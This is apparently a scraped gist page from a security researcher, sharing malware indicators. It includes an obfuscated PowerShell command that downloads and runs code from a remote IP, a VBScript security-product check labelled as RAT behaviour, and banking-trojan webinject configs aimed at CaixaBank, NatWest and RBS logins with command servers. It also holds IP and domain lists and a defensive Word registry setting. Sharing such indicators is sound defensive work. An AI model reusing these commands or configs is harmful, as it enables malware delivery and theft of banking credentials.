Bryan Campbell brycampbell

## gist:8ae6437b1e7121f796ea33fd98c97300
c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('http://185.176.221[.]146/download/s/GTz')

## gist:757db42fc0c1be44e36f4097a13be3ed
# Typical RAT like behavior using wmic for detection of installed security produts

"WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List" (Indicator: "root\cimv2")
"root\cimv2" (Indicator: "root\cimv2")
"Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
For Each objItem in colItems
With objItem
WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
End With

## gist:1d54dfb9c877a8a2cbf2f7c967c394bf
<dinj>
<lm>*caixabank.es/particular/*html*</lm>
<hl>http://92.63.105.118/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>

## gist:b06547b02ced79ae58840acb75243c70
<sinj>
<mm>https://www.bankline.natwest.com*</mm>
<sm>https://www.bankline.natwest.com/CWSLogon/logon.do*</sm>
<nh>ccsarewkpsmofyibdhqcgvnltzxj.net</nh>
<srv>195.133.144.126:443</srv>
</sinj>
<sinj>
<mm>https://www.bankline.rbs.com*</mm>
<sm>https://www.bankline.rbs.com/CWSLogon/logon.do*</sm>
<nh>cdsarpwtfdxysnmgejvzbicolqku.net</nh>

## gist:5fabaff9db4f0910b51a8dfc9bcb86ac
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

## IPs.txt
5.2.76.29
5.12.28.0
5.20.186.52
5.45.64.113
5.45.67.36
5.45.84.9
5.45.86.128
5.107.95.27
5.133.179.13
5.133.179.236

## gist:21393057b99b85749e96ef2469fea7c3
addicted2success.com,2017-09-20 01:10:57,2017-09-21 06:54:59,registered
imagesq2a.voldoor-sibir.ru,2017-09-21 06:54:06,2017-09-21 06:54:06,registered
apwvx.adsbtrack.com,2017-09-19 11:08:10,2017-09-21 06:53:30,registered
oc.machnik.de.com,2017-09-21 06:44:28,2017-09-21 06:44:28,registered
www.conversechuckssale.de.com,2017-09-21 06:44:06,2017-09-21 06:44:06,registered
skatismoshop.com.br,2017-09-21 06:44:00,2017-09-21 06:44:00,registered
www.youporn.com,2017-09-19 19:28:35,2017-09-21 06:42:12,registered
insights.masterlease.uk.com,2017-09-21 06:41:00,2017-09-21 06:41:00,registered
disney.hammonds.uk.com,2017-09-21 06:39:56,2017-09-21 06:39:56,registered
w9p9n.gengdflauraceous.review,2017-09-21 06:36:23,2017-09-21 06:36:23,registered
	# Typical RAT like behavior using wmic for detection of installed security produts

	"WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List" (Indicator: "root\cimv2")
	"root\cimv2" (Indicator: "root\cimv2")
	"Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
	Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
	For Each objItem in colItems
	With objItem
	WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
	End With
	<dinj>
	<lm>caixabank.es/particular/html*</lm>
	<hl>http://92.63.105.118/response.php</hl>
	<pri>100</pri>
	<sq>2</sq>
	<ignore_mask>.gif</ignore_mask>
	<ignore_mask>.jpg</ignore_mask>
	<ignore_mask>.png</ignore_mask>
	<ignore_mask>.js</ignore_mask>
	<ignore_mask>.css</ignore_mask>
	<sinj>
	<mm>https://www.bankline.natwest.com*</mm>
	<sm>https://www.bankline.natwest.com/CWSLogon/logon.do*</sm>
	<nh>ccsarewkpsmofyibdhqcgvnltzxj.net</nh>
	<srv>195.133.144.126:443</srv>
	</sinj>
	<sinj>
	<mm>https://www.bankline.rbs.com*</mm>
	<sm>https://www.bankline.rbs.com/CWSLogon/logon.do*</sm>
	<nh>cdsarpwtfdxysnmgejvzbicolqku.net</nh>
	Windows Registry Editor Version 5.00

	[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
	"DontUpdateLinks"=dword:00000001

	[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
	"DontUpdateLinks"=dword:00000001

	[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
	"DontUpdateLinks"=dword:00000001
	5.2.76.29
	5.12.28.0
	5.20.186.52
	5.45.64.113
	5.45.67.36
	5.45.84.9
	5.45.86.128
	5.107.95.27
	5.133.179.13
	5.133.179.236
	addicted2success.com,2017-09-20 01:10:57,2017-09-21 06:54:59,registered
	imagesq2a.voldoor-sibir.ru,2017-09-21 06:54:06,2017-09-21 06:54:06,registered
	apwvx.adsbtrack.com,2017-09-19 11:08:10,2017-09-21 06:53:30,registered
	oc.machnik.de.com,2017-09-21 06:44:28,2017-09-21 06:44:28,registered
	www.conversechuckssale.de.com,2017-09-21 06:44:06,2017-09-21 06:44:06,registered
	skatismoshop.com.br,2017-09-21 06:44:00,2017-09-21 06:44:00,registered
	www.youporn.com,2017-09-19 19:28:35,2017-09-21 06:42:12,registered
	insights.masterlease.uk.com,2017-09-21 06:41:00,2017-09-21 06:41:00,registered
	disney.hammonds.uk.com,2017-09-21 06:39:56,2017-09-21 06:39:56,registered
	w9p9n.gengdflauraceous.review,2017-09-21 06:36:23,2017-09-21 06:36:23,registered